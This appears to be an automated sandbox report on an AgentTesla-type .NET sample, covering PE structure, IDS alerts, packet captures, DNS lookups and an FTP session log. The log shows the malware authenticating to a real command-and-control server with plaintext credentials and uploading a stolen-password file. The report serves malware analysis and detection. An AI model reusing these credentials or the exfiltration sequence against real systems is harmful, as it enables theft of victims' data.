add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al
add byte ptr [eax], al

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0xf1de0	0x4b	.text
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf2000	0x586	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0xf4000	0xc	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2000	0x8	.text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x2008	0x48	.text
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x2000	0xefe34	0xf0000	cadbe61e04c8f8de70f802c58b0a0fc3	False	0.4536051432291667	data	6.960335286336614	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc	0xf2000	0x586	0x600	d45152ed82fbaea65a2827053b941250	False	0.4127604166666667	data	4.013033306945572	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0xf4000	0xc	0x200	58586d625b6a4f6704526c5bcc5dad63	False	0.044921875	data	0.10191042566270775	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_VERSION	0xf20a0	0x2fc	data			0.43586387434554974
RT_MANIFEST	0xf239c	0x1ea	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators			0.5489795918367347

Imports

DLL	Import
mscoree.dll	_CorExeMain

Network Behavior

Suricata IDS Alerts

Timestamp	SID	Signature	Severity	Source IP	Source Port	Dest IP	Dest Port	Protocol
2025-01-11T01:15:25.002925+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.11	49712	213.189.52.181	21	TCP
2025-01-11T01:15:25.560566+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.11	49713	213.189.52.181	65516	TCP
2025-01-11T01:15:25.566865+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.11	49713	213.189.52.181	65516	TCP
2025-01-11T01:15:36.646308+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.11	49718	213.189.52.181	21	TCP
2025-01-11T01:15:37.203280+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.11	49721	213.189.52.181	64074	TCP
2025-01-11T01:15:37.208459+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.11	49721	213.189.52.181	64074	TCP
2025-01-11T01:15:44.430083+0100	2029927	ET MALWARE AgentTesla Exfil via FTP	1	192.168.2.11	49726	213.189.52.181	21	TCP
2025-01-11T01:15:44.991137+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.11	49727	213.189.52.181	63872	TCP
2025-01-11T01:15:44.996483+0100	2855542	ETPRO MALWARE Agent Tesla CnC Exfil Activity	1	192.168.2.11	49727	213.189.52.181	63872	TCP
2025-01-11T01:16:57.647871+0100	1800007	Joe Security MALWARE AgentTesla - FTP Exfil Keyboard Logs	1	192.168.2.11	49929	213.189.52.181	63898	TCP

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 01:15:20.914655924 CET	49711	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:20.914767027 CET	443	49711	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:20.914856911 CET	49711	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:21.307173967 CET	49711	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:21.307225943 CET	443	49711	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:21.787609100 CET	443	49711	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:21.787754059 CET	49711	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:21.827548981 CET	49711	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:21.827606916 CET	443	49711	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:21.827924967 CET	443	49711	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:21.879077911 CET	49711	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:22.194001913 CET	49711	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:22.235338926 CET	443	49711	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:22.305874109 CET	443	49711	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:22.305932045 CET	443	49711	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:22.306010962 CET	49711	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:22.316674948 CET	49711	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:23.137670994 CET	49712	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:23.142544985 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:23.142626047 CET	49712	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:23.733494997 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:23.733726978 CET	49712	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:23.738594055 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:23.928324938 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:23.928464890 CET	49712	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:23.933350086 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:24.221513033 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:24.221688986 CET	49712	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:24.226560116 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:24.415559053 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:24.415709972 CET	49712	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:24.420555115 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:24.609350920 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:24.609474897 CET	49712	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:24.614259005 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:24.803018093 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:24.803270102 CET	49712	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:24.808113098 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:24.996920109 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:24.997615099 CET	49713	65516	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:25.002785921 CET	65516	49713	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:25.002924919 CET	49712	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:25.002926111 CET	49713	65516	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:25.007883072 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:25.560271978 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:25.560565948 CET	49713	65516	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:25.560595036 CET	49713	65516	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:25.565355062 CET	65516	49713	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:25.566795111 CET	65516	49713	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:25.566864967 CET	49713	65516	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:25.613392115 CET	49712	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:25.753854990 CET	21	49712	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:25.800852060 CET	49712	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:33.252110958 CET	49717	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:33.252161026 CET	443	49717	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:33.252356052 CET	49717	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:33.255878925 CET	49717	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:33.255896091 CET	443	49717	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:33.720416069 CET	443	49717	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:33.720514059 CET	49717	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:33.722167969 CET	49717	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:33.722181082 CET	443	49717	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:33.722405910 CET	443	49717	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:33.769680023 CET	49717	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:33.779448986 CET	49717	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:33.823333979 CET	443	49717	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:33.887706995 CET	443	49717	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:33.887767076 CET	443	49717	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:33.888134956 CET	49717	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:33.890244961 CET	49717	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:34.774183035 CET	49718	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:34.780000925 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:34.780087948 CET	49718	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:35.373526096 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:35.373754025 CET	49718	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:35.378623009 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:35.567496061 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:35.567634106 CET	49718	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:35.572480917 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:35.863121986 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:35.863270998 CET	49718	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:35.868150949 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:36.057035923 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:36.057446957 CET	49718	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:36.062356949 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:36.251548052 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:36.251746893 CET	49718	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:36.256592989 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:36.445424080 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:36.447154045 CET	49718	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:36.452004910 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:36.640790939 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:36.641309023 CET	49721	64074	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:36.646117926 CET	64074	49721	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:36.646306992 CET	49721	64074	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:36.646307945 CET	49718	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:36.651165009 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:37.203043938 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:37.203279972 CET	49721	64074	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:37.203375101 CET	49721	64074	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:37.208112955 CET	64074	49721	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:37.208399057 CET	64074	49721	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:37.208458900 CET	49721	64074	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:37.254054070 CET	49718	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:37.395586014 CET	21	49718	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:37.441536903 CET	49718	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:41.130614996 CET	49725	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:41.130664110 CET	443	49725	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:41.134730101 CET	49725	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:41.137892962 CET	49725	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:41.137923956 CET	443	49725	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:41.611650944 CET	443	49725	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:41.611761093 CET	49725	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:41.613543034 CET	49725	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:41.613558054 CET	443	49725	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:41.613908052 CET	443	49725	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:41.660265923 CET	49725	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:41.760977983 CET	49725	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:41.807374954 CET	443	49725	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:41.871066093 CET	443	49725	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:41.871138096 CET	443	49725	104.26.13.205	192.168.2.11
Jan 11, 2025 01:15:41.873610020 CET	49725	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:41.917671919 CET	49725	443	192.168.2.11	104.26.13.205
Jan 11, 2025 01:15:42.542340040 CET	49726	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:42.547399044 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:42.547480106 CET	49726	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:42.641711950 CET	49718	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:43.157371998 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:43.157576084 CET	49726	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:43.162414074 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:43.353605986 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:43.353779078 CET	49726	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:43.358622074 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:43.627499104 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:43.627662897 CET	49726	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:43.632522106 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:43.823437929 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:43.823604107 CET	49726	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:43.828481913 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:44.030733109 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:44.030894041 CET	49726	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:44.035805941 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:44.226789951 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:44.227814913 CET	49726	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:44.232686043 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:44.423666000 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:44.424635887 CET	49727	63872	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:44.429734945 CET	63872	49727	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:44.430001020 CET	49727	63872	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:44.430083036 CET	49726	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:44.436573982 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:44.990879059 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:44.991137028 CET	49727	63872	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:44.991184950 CET	49727	63872	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:44.996048927 CET	63872	49727	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:44.996423960 CET	63872	49727	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:44.996483088 CET	49727	63872	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:45.035279989 CET	49726	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:15:45.185775995 CET	21	49726	213.189.52.181	192.168.2.11
Jan 11, 2025 01:15:45.238432884 CET	49726	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:55.161345005 CET	49917	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:55.166241884 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:55.166732073 CET	49917	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:55.793698072 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:55.793864965 CET	49917	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:55.798626900 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:55.985843897 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:55.985969067 CET	49917	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:55.990770102 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:56.280817032 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:56.281007051 CET	49917	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:56.285887003 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:56.474520922 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:56.474668026 CET	49917	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:56.479475975 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:56.667603970 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:56.669245005 CET	49917	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:56.674721003 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:56.861061096 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:56.861447096 CET	49917	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:56.866271973 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:57.053361893 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:57.054151058 CET	49929	63898	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:57.058995008 CET	63898	49929	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:57.059107065 CET	49929	63898	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:57.059230089 CET	49917	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:57.063997984 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:57.642431974 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:57.642731905 CET	49929	63898	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:57.642776012 CET	49929	63898	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:57.647574902 CET	63898	49929	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:57.647811890 CET	63898	49929	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:57.647871017 CET	49929	63898	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:57.691643953 CET	49917	21	192.168.2.11	213.189.52.181
Jan 11, 2025 01:16:57.836504936 CET	21	49917	213.189.52.181	192.168.2.11
Jan 11, 2025 01:16:57.879158974 CET	49917	21	192.168.2.11	213.189.52.181

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jan 11, 2025 01:15:20.902167082 CET	52826	53	192.168.2.11	1.1.1.1
Jan 11, 2025 01:15:20.908967972 CET	53	52826	1.1.1.1	192.168.2.11
Jan 11, 2025 01:15:23.128412008 CET	49272	53	192.168.2.11	1.1.1.1
Jan 11, 2025 01:15:23.136982918 CET	53	49272	1.1.1.1	192.168.2.11

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jan 11, 2025 01:15:20.902167082 CET	192.168.2.11	1.1.1.1	0x9292	Standard query (0)	api.ipify.org	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:15:23.128412008 CET	192.168.2.11	1.1.1.1	0xfdbf	Standard query (0)	s4.serv00.com	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	Address	Type	Class	DNS over HTTPS
Jan 11, 2025 01:15:20.908967972 CET	1.1.1.1	192.168.2.11	0x9292	No error (0)	api.ipify.org	104.26.13.205	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:15:20.908967972 CET	1.1.1.1	192.168.2.11	0x9292	No error (0)	api.ipify.org	104.26.12.205	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:15:20.908967972 CET	1.1.1.1	192.168.2.11	0x9292	No error (0)	api.ipify.org	172.67.74.152	A (IP address)	IN (0x0001)	false
Jan 11, 2025 01:15:23.136982918 CET	1.1.1.1	192.168.2.11	0xfdbf	No error (0)	s4.serv00.com	213.189.52.181	A (IP address)	IN (0x0001)	false

HTTP Request Dependency Graph

api.ipify.org

HTTPS Proxied Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.11	49711	104.26.13.205	443	6412	C:\Users\user\Desktop\ukBQ4ch2nE.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 00:15:22 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-11 00:15:22 UTC	424	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 00:15:22 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 9000b6440f8d1a13-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1923&min_rtt=1899&rtt_var=760&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1396461&cwnd=169&unsent_bytes=0&cid=1992ac3247691380&ts=529&x=0"
2025-01-11 00:15:22 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.11	49717	104.26.13.205	443	1400	C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 00:15:33 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-11 00:15:33 UTC	424	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 00:15:33 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 9000b68c7f1542b7-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1718&min_rtt=1710&rtt_var=658&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2821&recv_bytes=769&delivery_rate=1640449&cwnd=212&unsent_bytes=0&cid=6aa31f501f22356a&ts=172&x=0"
2025-01-11 00:15:33 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.11	49725	104.26.13.205	443	3000	C:\Users\user\AppData\Roaming\Adobe\adobe.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-11 00:15:41 UTC	155	OUT	GET / HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:99.0) Gecko/20100101 Firefox/99.0 Host: api.ipify.org Connection: Keep-Alive
2025-01-11 00:15:41 UTC	424	IN	HTTP/1.1 200 OK Date: Sat, 11 Jan 2025 00:15:41 GMT Content-Type: text/plain Content-Length: 12 Connection: close Vary: Origin CF-Cache-Status: DYNAMIC Server: cloudflare CF-RAY: 9000b6be5c6542a5-EWR server-timing: cfL4;desc="?proto=TCP&rtt=1584&min_rtt=1581&rtt_var=599&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2819&recv_bytes=769&delivery_rate=1818181&cwnd=229&unsent_bytes=0&cid=9bd18bf76f46c2ef&ts=265&x=0"
2025-01-11 00:15:41 UTC	12	IN	Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 Data Ascii: 8.46.123.189

FTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Jan 11, 2025 01:15:23.733494997 CET	21	49712	213.189.52.181	192.168.2.11	220---------- Welcome to Pure-FTPd [privsep] [TLS] ---------- 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 01:15. Server port: 21. 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login 220---------- Welcome to Pure-FTPd [privsep] [TLS] ----------220-You are user number 3 of 150 allowed.220-Local time is now 01:15. Server port: 21.220-This is a private system - No anonymous login220 You will be disconnected after 15 minutes of inactivity.
Jan 11, 2025 01:15:23.733726978 CET	49712	21	192.168.2.11	213.189.52.181	USER f2241_evico
Jan 11, 2025 01:15:23.928324938 CET	21	49712	213.189.52.181	192.168.2.11	331 User f2241_evico OK. Password required
Jan 11, 2025 01:15:23.928464890 CET	49712	21	192.168.2.11	213.189.52.181	PASS Doll650#@
Jan 11, 2025 01:15:24.221513033 CET	21	49712	213.189.52.181	192.168.2.11	230 OK. Current restricted directory is /
Jan 11, 2025 01:15:24.415559053 CET	21	49712	213.189.52.181	192.168.2.11	504 Unknown command
Jan 11, 2025 01:15:24.415709972 CET	49712	21	192.168.2.11	213.189.52.181	PWD
Jan 11, 2025 01:15:24.609350920 CET	21	49712	213.189.52.181	192.168.2.11	257 "/" is your current location
Jan 11, 2025 01:15:24.609474897 CET	49712	21	192.168.2.11	213.189.52.181	TYPE I
Jan 11, 2025 01:15:24.803018093 CET	21	49712	213.189.52.181	192.168.2.11	200 TYPE is now 8-bit binary
Jan 11, 2025 01:15:24.803270102 CET	49712	21	192.168.2.11	213.189.52.181	PASV
Jan 11, 2025 01:15:24.996920109 CET	21	49712	213.189.52.181	192.168.2.11	227 Entering Passive Mode (213,189,52,181,255,236)
Jan 11, 2025 01:15:25.002924919 CET	49712	21	192.168.2.11	213.189.52.181	STOR PW_user-436432_2025_01_10_19_15_22.html
Jan 11, 2025 01:15:25.560271978 CET	21	49712	213.189.52.181	192.168.2.11	150 Accepted data connection
Jan 11, 2025 01:15:25.753854990 CET	21	49712	213.189.52.181	192.168.2.11	226-File successfully transferred 226-File successfully transferred226 0.193 seconds (measured here), 1.75 Kbytes per second
